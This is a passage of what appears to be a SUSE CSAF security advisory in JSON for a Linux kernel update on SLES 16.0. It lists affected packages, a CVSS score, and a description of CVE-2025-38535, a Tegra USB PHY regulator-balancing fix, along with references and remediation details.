"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38530"
},
{
"cve": "CVE-2025-38535",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38535"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nphy: tegra: xusb: Fix unbalanced regulator disable in UTMI PHY mode\n\nWhen transitioning from USB_ROLE_DEVICE to USB_ROLE_NONE, the code\nassumed that the regulator should be disabled. However, if the regulator\nis marked as always-on, regulator_is_enabled() continues to return true,\nleading to an incorrect attempt to disable a regulator which is not\nenabled.\n\nThis can result in warnings such as:\n\n[ 250.155624] WARNING: CPU: 1 PID: 7326 at drivers/regulator/core.c:3004\n_regulator_disable+0xe4/0x1a0\n[ 250.155652] unbalanced disables for VIN_SYS_5V0\n\nTo fix this, we move the regulator control logic into\ntegra186_xusb_padctl_id_override() function since it\u0027s directly related\nto the ID override state. The regulator is now only disabled when the role\ntransitions from USB_ROLE_HOST to USB_ROLE_NONE, by checking the VBUS_ID\nregister. This ensures that regulator enable/disable operations are\nproperly balanced and only occur when actually transitioning to/from host\nmode.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38535",
"url": "https://www.suse.com/security/cve/CVE-2025-38535"
},
{
"category": "external",
"summary": "SUSE Bug 1248240 for CVE-2025-38535",
"url": "https://bugzilla.suse.com/1248240"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
